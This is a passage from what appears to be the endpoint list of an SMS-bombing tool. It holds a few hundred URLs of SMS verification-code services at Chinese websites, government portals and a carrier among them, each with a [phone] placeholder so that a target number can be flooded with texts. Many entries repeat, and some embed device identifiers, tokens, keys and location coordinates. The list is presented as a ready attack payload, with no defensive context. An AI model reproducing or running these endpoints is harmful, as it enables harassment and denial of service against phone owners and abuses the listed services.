"http://www.hyb100.com/huoyb/vc10001.action?userid=[phone]&ic10000=", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://demo.q20x.xyz/sms.php?phone=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "https://app.hbooker.com/signup/send_verify_code?callback=jQuery111009421744498287961_1580993309090&account=62634757818&app_version=2.3.102&hashvalue=1b817ef4600f743b4517f40764cd4705&device_token=iPhone-3D34A72B-B07D-4260-BF0F-EDBC96F214B9&verify_type=1&phone_num=1-", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "https://register.7moor.com/Action?callback=jQuery17202698357481160306_1589614815141&action=register.rl7mWebSiteYZMWebCallTryMobileCode&data=%7B%22mobile%22%3A%22[phone]%22%7D&_=1589614821972", + "https://passport.iqiyi.com/apis/user/check_account.action?account=[phone]&agenttype=20&app_version=10.7.5&area_code=86&device_id=5C351103-F887-4932-BC59-58C75875EFDE&device_name=liang%E7%9A%84%20iPhone&device_type=iPhone8,1&dfp=876bc199dfb98e452da6f0f683179849687da", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "https://m.yiwise.com/apiPlatform/verificationCode/send?phoneNumber=[phone]", + "http://passport2.chaoxing.com/num/phonecode?phone=[phone]&needcode=false", + "https://ubas.360jie.com.cn/ubas/event/report?flowNo=49181563973602947&bizCode=REGISTER_LOGIN&eventCode=SEND_SMSCODE&pageName=login.html&ABTest=A&TuanABTest=A&userOprTime=1563973631831&hostApp=APP&sourceType=APK&channelSource=CH_001_IOS&subChannel=&activityInfo=&utm", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://demo.q20x.xyz/sms.php?phone=[phone]", + "http://reg.suning.com/srs-web/ajax/code/sms.do?scen=PERSON_MOBILE_REG_VERIFY_MOBILE&phoneNum=[phone]&uid=&code=", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://baiwai100.com/exam/regcheckSms.yj?telphone=[phone]", + "http://m.aihuaju.com/wap/index.php?act=security&op=send_reg_mobile&mobile=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "https://uas.xingshulin.com/passport/default/captcha/LOGIN/sms/[phone]?", + "https://uas.xingshulin.com/passport/default/captcha/LOGIN/sms/[phone]?", + "http://voip-newapi20160601.voip-oem.com/api/Account/GetValidateCodeNoUser?SrcPhone=[phone]&type=1&proxyId=5318302", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://m.cstm.org.cn/wxReg/regPhoneCheck?regPhone=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://www.shengjob.com/Resume/PhoneCode_Tem.aspx?Phones=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://m.cqrenrenle.com/v3/users/code?mobile=[phone]&from=reg&packagename=com.feifan.app&platform=android", + "http://demo.q20x.xyz/sms.php?phone=[phone]", + "https://app.aplum.com/user/sendmsg?fromApp=1&phone=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "https://androidapi4.yc.ifeng.com:443/api/fread/user/msgAuthCode?phoneNum=[phone]&v=5.5.32.83027", + "http://api.xingchentd.com/logic-user/user:users/mobile/?mobile=[phone]&projection=withRoles", + "http://api.huatu.com/lumenapi/v4/common/message/send_by_java?callback=callbackSendCode&mobile=[phone]&_=1547130695671", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "http://www.dgzz1.com:20002/LoginMobileYanZheng?MOBILE=[phone]", + "https://api.1sapp.com/captcha/getSmsCaptcha?GUID=9b079137577015d58e0428cbae5.61417812&OSVersion=12.4&active_method=icon&deviceCode=5C351103-F887-4932-BC59-58C75875EFDE&distinct_id=&dtu=100&lat=29.58959433282935&lon=106.281065329089&network=WIFI&sign=73ffc97fcc0d33c", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "https://dappweb.huolala.cn/index.php?_su=1609554659540820860&revision=&_m=register&_a=send_register_sms_code&phone_no=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://passport.csdn.net/account/mobileregister?action=sendMobileCode&mobile=[phone]", + "http://slb-sport.vesal.cn/vesal-sport-prod/v1/app/member/getCode?tellAndEmail=[phone]", + "https://gwc.drugs360.cn/index.php?r=UserCenter/getCellphoneCode&type=4&cellphone=[phone]&city=%E9%87%8D%E5%BA%86%E5%B8%82&lat=29.593100&lng=106.291519&version=6.1&os=ios&auth=1&sign=1ae1dda00913d0707905455258cd5045", + "http://gangqinpu.yusi.tv/?urlparam=cginfo/userinfo/sendsms&phonenum=[phone]&platform=iphone&sendtype=1&version=1.5.6", + "https://puser.hnzwfw.gov.cn:8081/api/user/sms?mobile=[phone]&_=1590559098473", + "http://demo.q20x.xyz/sms.php?phone=[phone]", + "https://app.quyiyuan.com/APP/user/action/LoginAction.jspx?APPOINT_SOURCE=0&CHANNEL_ID=&IMEI_ID=3ECFD13A-235B-47A9-A9E1-F4DCC64D360F&PHONEOPERATINGSYS=2&PHONETYPE=iPhone8,1&PHONEVERSIONNUM=12.4.1&PHONE_NUMBER=[phone]&PUBLIC_SERVICE_TYPE=0&hospitalID=&isRead=1&loc=c&", + "http://www.hx2car.com/mobile/loginCode.json?code=d889c6084be2613b8ed976d2336bc53a&devicetoken=0FAEEA4E-B279-4409-93A6-05B4EDE49DE8&phoNum=[phone]", + "http://api.huatu.com/lumenapi/v4/common/message/send_by_java?callback=callbackSendCode&mobile=[phone]&_=1547130695671", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=12", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://dapi.mting.info/yyting/usercenter/getVerifyCode.action?phoneNum=[phone]&type=0&token=&imei=&nwt=1&q=27&sc=", + "http://jyqb.jyqb168.com/registerH5/registerCode?phone=[phone]&invite_code=MTE3MDUx&user_from=97bf875e61bd47f", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=24", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://mapi.qfang.com/appapi/v8_3_2/sms/validateCode?codeKey=27FA9799-8840-408F-9C14-116B054296B3&countryCode=86&dataSource=SHENZHEN&devIDFA=5C351103-F887-4932-BC59-58C75875EFDE&devId=C99D7E86-40F2-4B39-A2DD-5438D94BC5E5&devModel=12.4&devOpenUDID=40dfbfa80eda77c04", + "http://api.mianmianyue.com/basis/sendCheckCode?mobile=[phone]&checkSign=Gec1LPgwdA4OOyqQLAS5UkZnmck2eRyJxJP6rvTU7K8%253D", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=22", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://api.qingmang.me/v1/account.sendVerification?code=1566478386.8872059778&phone=[phone]", + "https://api.julym.com/hz/api.html?number=[phone]", + "http://bank.wo.cn/wxun/api/my/getSmsCode?mobile=[phone]", + "http://i.vaakwe.com/user/reg_send_code.php?mobile=[phone]&country=0086&udid=a884f6c7f15ff08a97ab16e4d33fe2c216a9ebed&imei=02:00:00:00:00:00&mac=02:00:00:00:00:00&imsi=02:00:00:00:00:00&token=ba4edbf30bc5363ba02875fc4c6b25c8a21ed8a99e21c5c40ff6385c43c71c8b&type=sms&", + "http://a.xcar.com.cn/bbs/dialog.php?daction=register&drequest=check&chash=ZuXty1HoAbfduG8MIMA2O53l&dhash=N7numlHsAbbf5hAGcbc&ehash=ZO+6mFrpB77Uv24KcMJmPpi0oTCxsaUtNQa9KWIYNzYJ3WVcKC+/CA&phone=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://api.xtgyl.cn/index.php/api_v1/api.app.login/sendCaptcha?mobile=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://i.xfvw.cn/api/sms/send?mobile=[phone]&event=register", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "https://suyun-guest.daojia.com/api/guest/antcheat?aLiDeviceToken=&app_idfa_real=5C351103-F887-4932-BC59-58C75875EFDE&app_source=2&app_uuid=BC445415-3280-46CD-8EF2-87936A0D762F&channel-id=Appstore&cityid=37&common_lat=29.5870231&common_lng=106.2847588&imei=F3F6BCC9-", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://kyddn.log56.com/sq_server/verifyCode.action?mobile_no=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "https://appapi.che168.com/phone/v55/user/CreateRegLoginMobileCode.ashx?_appid=2scapp.ios&_sign=bd185e04d8bdb0422467b0f95f828b49&appversion=7.7.0&channelid=App Store&ip=192.168.43.151&mobile=[phone]&udid=5WklXEFrvscsddZR8s3TrLI45Bg0YEW9MkEFqRLSrR1ZKpY81h2wTw8pEHBo", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]&hash=9f82736455da1c53", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://msg.106117.com/submit_ajax.ashx?callback=jQuery11120017795995642418072_1558097551516&username=[phone]&action=getValidate&_=1558097551517", + "http://api.wangxiao.cn:80/app/user.ashx?mobile=[phone]&t=mobilelogincode", + "http://www.huobiao.cn/core/login/get_code_snv?jsonpcallback=jQuery22408161556854897054_1570699976143&phone=[phone]&_=1570699976144", + "http://m.aihuaju.com/wap/index.php?act=security&op=send_reg_mobile&mobile=[phone]", + "http://demo.q20x.xyz/sms.php?phone=[phone]", + "http://api.wangxiao.cn/app/user.ashx?mobile=[phone]&t=mobilelogincode", + "https://api.sharkshopping.com/ec/api?method=b2c.member2.related_sms&uname=[phone]&type=1", + "http://weizhang.58.com/user/login/getcode?mobile=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "https://doctor.helianhealth.com/api/v3/auth/common/getSMScode?cellphone=[phone]&sign=d821db6c5629ea532b9f8ff95e39e952&smsType=1&timestamp=1568266253&type=1", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]&app_code=ECS-YH-WAP", + "http://www.xlcidc.com/chkName.asp?umobie=[phone]&lm=sendmobi&sd=0.5806221691630391", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "https://ly.hao315.com/MsgYzm.php?tel=[phone]", + "http://www.xlcidc.com/chkName.asp?umobie=[phone]&lm=sendmobi&sd=0.5806221691630391", + "http://api.hanju.koudaibaobao.com/api/user/verifyMobile?_ts=1564136775711&country=%2B86&mobile=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://www.ahtba.org.cn/Registration/SendSms?phone=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "https://gongdu.youshu.cc/m/sign/msg?callback=jQuery111009421744498287961_1580993309090&nonce=18907&mobile=[phone]&os=ios&timestamp=1569225015&type=mobile&soft=5.4.2&_=1580993309101", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://case.100.com/captcha?source=57&mobile=[phone]&resend=0&mkey=customer", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "https://n.daoxila.com/verification/appSend?mobile=[phone]&time=1564746677059", + "http://m.logofree.cn/misc.php?act=send_sms&m=[phone]&token=f3c95f20b6628ae17a40111ebf4170e8", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://appsource.taohv.cc/user/sendRegisterCode.php?version_android=4.1.9&channel_android=lianxiang&mobile=[phone]&code=&sign=21119a7fa9bbb06b6470ce49db996711", + "http://jyw.vhujao.cn/m/reg/motregchk.php?mob=[phone]", + "http://m.aihuaju.com/wap/index.php?act=security&op=send_reg_mobile&mobile=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "https://pass.hujiang.com/v2/Handler/UCenter?action=SendMsg&imgcode=&token=1e7bbab658a5b65cbc3074d6296a0b9b&sendtype=register&msgtype=1&captchaVersion=2&user_domain=hj&business_domain=&hpuid=P0S4wETf4noqmS29L5650&callback=reqwest_1546707722757024049&mobile=%2B86-[ph", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://zhuikanxs.com/novelapilogin/sendsms?phone=[phone]&idfa=5C351103-F887-4932-BC59-58C75875EFDE&package=sxrqowww.com&version=1.6.9&token=384e798aee87f24f4a228a41df049e27&type=1&timestamp=1567400876&sign=9726d9876bd9e1bbc5667eeadd28e42b", + "http://api.luobokoudai.com/User/GetCodeByPhone?ip=124.228.103.38&source=1&channel=yingyonbao&key=f996ee442307b7c6ccfcfc68bcf77682&user_phone=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://demo.q20x.xyz/sms.php?phone=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=11", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "https://pass.cctalk.com/intraApi/v1/sms/send?action=SendMsg&mobile=%2B86-[phone]&imgcode=&token=aa315477956d459f40b6f26c9090b790&sendtype=mobilemsgpwd&msgtype=1&captchaVersion=2&user_domain=cc&business_domain=&hpuid=924-ECmHmDZ0xdhMnXe-43&callback=reqwest_1589532775907030687", + "http://gangqinpu.yusi.tv/?urlparam=cginfo/userinfo/sendsms&phonenum=[phone]&platform=iphone&sendtype=1&version=1.5.6", + "http://api.wangxiao.cn:80/app/user.ashx?mobile=[phone]&t=mobilelogincode", + "http://www.imdxd.com/api/method/getCode?phone=[phone]&type=2", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://i.xfvw.cn/api/sms/send?mobile=[phone]&event=register", + "http://app.yimian.red/service/hs/login/sms?telphone=[phone]&type=0&time=1563875962595&sign=f714baa6f3788e90bf483d6b2e22a133", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=20", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "https://apis.hyguanjia.com/user/send/phone/code?clientid=1254299999&mid=1E0D9617-438F-4A0D-BED0-AEB20FF19A50&phone=[phone]&sign=jBvhDrZ6SlcNzwkCx6SIhwkLtCZZ1GCCjvPj%2524%2524QD8balMbMtSRigOLwJkGjU%2540%2540PIsjj1rTgAEWBZDHlnw3%2540%2540Yrg9qGdwvb5Qv4euoCCHNExqXAGhb", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://m.aihuaju.com/wap/index.php?act=security&op=send_reg_mobile&mobile=[phone]", + "https://nhapi02.tv189.com/cpms/Internet?appid=111010310225&phone=[phone]&cliver=1.32.1.6&idfa=5C351103-F887-4932-BC59-58C75875EFDE&NetType=WIFI&channelID=01834721&type=register&iosid=ccb2ffcb0bc0a5b42678ac61fed3372bed1ce69a&token=b1fa0dc43dc3ed1b9c4d9cb5f5e57529&pc", + "http://www.lecake.com/customer/get-code.html?yzm=10000&mobile=[phone]&_=1551173567939", + "https://kaojiazhao.eclicks.cn/xc_v1/Enroll/create_code?driving_cert_type=1&_cityCode=023&tel=[phone]&learn_stage=0&appChannel=App Store&cUDID=5C351103-F887-4932-BC59-58C75875EFDE&lng=106.2849618867906&appVersion=7.5.3&que_city_id=27&os=iOS&enr_city_id=75&openUDID", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "https://couple-api.jizhangapp.com/login/captcha/[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=17", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "https://cap.caocaokeji.cn/bps/sendVerifyCode/2.0?appCode=2WZ2JRQR708W&appVersion=4.3.2&buildVersion=192&clientType=1&deviceId=5C351103-F887-4932-BC59-58C75875EFDE&fullVersion=4.3.2.192&isJailBreak=0&mobileType=ios&phone=[phone]&sign=FB3ED4C94F2877A29366F19C4A7CED68", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://zaiwai.8848.com/commonService/sendNewVerificationCodeToPhone?phone=[phone]&isNewUser=1&messagePassWord=50BF9B170BC3FFD3F1F0C8E113DA88E6ADAF75D364508DB8969BA8928249E4CCD0AE01A96E8E435EDA7B5E7BB28F9D584BA1CEE44BC02D41C21D8DF04604A225", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "https://nhapi01.tv189.com/cpms/Internet?appid=111010310081&phone=[phone]&idfa=5C351103-F887-4932-BC59-58C75875EFDE&NetType=WIFI&channelID=01834221&type=register&iosid=ccb2ffcb0bc0a5b42678ac61fed3372bed1ce69a&devid=000001&pcode=4&accessType=99&clienttype=5&token=417", + "http://reg.suning.com:80/ajax/code/sms.do?scen=WAP_WCHAT_PUB_ACCT_UNION_LOGIN_MOBILE_REG&phoneNum=[phone]", + "https://dakaapp.troila.com/api/v7/index/send_sms?phone=[phone]&expect=0", + "http://mobile.health.pingan.com/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", + "http://www.txooo.com/Txooo/Main/BusinessRequirement/Ajax/BusinessRequirementAjax.ajax/SendMobileCode?mobile=[phone]", + "http://api.luobokoudai.com/User/GetCodeByPhone?ip=124.228.103.38&source=1&channel=yingyonbao&key=f996ee442307b7c6ccfcfc68bcf77682&user_phone=[phone]", + "https://mapi.wandougongzhu.cn/?method=User.sendRegCode&ch=appstore&devid=6850174bf9bcd0264c01eac202a8447e&devname=&devtype=iphone_gg&dpi=750x1334&img_fmt=webp&lang=zh-Hans-CN&loc=&model=iPhone8%2C1&network_type=wifi&os_version=12.4&phone=[phone]&rtick=1566790690.50", + "http://zhibo.zuoyebang.com/elearning/index/sendapplytoken?phone=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=3", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "https://api.bat100.net/v1/authority/sms/send-sms?tel=[phone]&smsType=2", + "http://v.juhe.cn/sms/send?mobile=[phone]&tpl_id=11115&tpl_value=%23code%23%3d321809&key=a68cead9b27523c56ce7fd7fc1312ea4", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://pass.hujiang.com/Handler/UCenter?action=SendMsg&callback=&imgCode=&token=&_=&mobile=[phone]", + "https://api.passport.pptv.com/snsms/sendcode?_source=ppsports&apptype=android&appversion=1.0.7.1&deviceId=7433976558071546231901338_vx768bn3ieimjk1n3g5opc7w&terminal=APP&phoneNumber=[phone]&channel=208000202030&format=json&", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=1", + "http://www.wehealthchina.net/api/v0.1/vcode?app=doctor&client=android&action=register&phone=[phone]", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=18", + "http://www.huobiao.cn/core/login/get_code_snv?jsonpcallback=jQuery22408161556854897054_1570699976143&phone=[phone]&_=1570699976144", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://duanxin.diluw.com/index.php?hm=[phone]&ok=", + "https://nhapi01.tv189.com/cpms/Internet?appid=111010310081&phone=[phone]&idfa=5C351103-F887-4932-BC59-58C75875EFDE&NetType=WIFI&channelID=01834221&type=register&iosid=ccb2ffcb0bc0a5b42678ac61fed3372bed1ce69a&devid=000001&pcode=4&accessType=99&clienttype=5&token=417", + "https://m.health.pingan.com/mapi/smsCode.json?deviceId=5a4c935cbb6ff6ca&deviceType=SM-G9300&timestamp=1545122608&app=0&platform=3&app_key=PAHealth&osversion=23&info=&version=1.0.1&resolution=1440x2560&screenSize=22&netType=1&channel=m_h5&phone=[phone]", + "https://n.daoxila.com/verification/appSend?mobile=[phone]&time=1564746677059", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "https://wapi.jfh6688.cn/sendRegisterCode?type=1&login=[phone]", + "https://app.leyou.com.cn/system/sendSms?mobile=[phone]&sign=fb0a624aade8b0e135196025cbc191c2&transtype=reg_m", + "http://zhibo.zuoyebang.com/elearning/index/sendapplytoken?phone=[phone]&_=1535534872440", + "http://yueban.500zhuan.com/tools/getNum?&phone=[phone]&sign=20f2f798a813a8115f5a837c7cad140b&timestamp=1566033453", + "http://puser.funshion.com/user/sendappsmscodenocaptcha?app=main&app_code=iphone&cl=iphone&content=%E6%82%A8%E7%9A%84%E7%9F%AD%E4%BF%A1%E9%AA%8C%E8%AF%81%E7%A0%81%E6%98%AF%3A%25verifycode%25%E3%80%82%E6%82%A8%E7%9A%84%E6%89%8B%E6%9C%BA%E5%8F%B7%E6%AD%A3%E5%9C%A8%E4%", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=22", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://m.renwo.com/Ajax/json.ashx?at=sendregsmsvcode&m=1&mobile=[phone]&_=1551173567899", + "http://m.tk.cn/tkmobile/orderSentSmsServlet?mobile=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://www.zkzcfu.cn/api/sms/send?mobile=[phone]&event=register", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://hz.95sc.cn/api.php?act=user&key=7awn1zd6tRCRuTDD1c&phone=[phone]", + "http://www.51qub.com/member/sendmobilesms?mobile=[phone]", + "https://app.api.ke.com/user/account/sendverifycodeforbindmobilev2?mobile_phone_no=[phone]&request_ts=1564116332", + "https://cloud.maitao.com/auth/code?cityId=2&uid=&cfbundleversion=5.12.0&imei=32E30496-2A31-463B-A1BD-75B005303E41&channelid=AppStore&devicetoken=69103da60f6eca7a15a995f4f33371ce6413567d5df01d1335f6ab25a47a2f3c&fromapp=1&token=05F452E3F79B7410AC8962C7445483E81AD2ACC", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://jyw.vhujao.cn/m/reg/motregchk.php?mob=[phone]", + "http://demo.q20x.xyz/sms.php?phone=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "https://gateway-api.kuainiujinke.com/etrack/record?date=2019-09-02&refer=https://www.daishangqian.com/m/#/user/login&source=dsq&timestamp=1567390955843&traceId=A15C586B-6CFF-47C7-81FF-3ACFFB39D046&uid=&url=https://www.daishangqian.com/m/%2", + "https://m.wanghairead.com/api/5b9e03e333e5e?phone=[phone]&send_type=1", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://jz.gymchina.com/api/user/getVerificationCode.json?phone=[phone]&platform=and&sid=43d54311742a6c62a11ef8b64d8c7ac1&brand=OPPO&version=2.2.6&appName=tomato&partner=xiaomi&model=PCRT00", + "https://passport.beva.com/passport/v1/sdk/sendvcode?callback=jQuery111009421744498287961_1580993309090&nonce=1569211859&devcode=1E0D9617438F4A0DBED0AEB20FF19A50&mobile=[phone]&scene=mobilelogin&sign=cba0ddbe3e68126d5d24d2d6342754d6&platform=6&_=1580993309095", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://mobile.icourses.cn/hep-mobile/sword/app/register/getCodeByPhone?callback=jQuery111009421744498287961_1580993309090&phone=1557078659&_=1580993309108", + "http://doc.u-ease.com/account/Verifycode/login?app_os=IOS&app_version=3.0.8&device_id=B097BD84-2B27-4E2B-AAB3-D05E3AE0FBE0&phone=[phone]", + 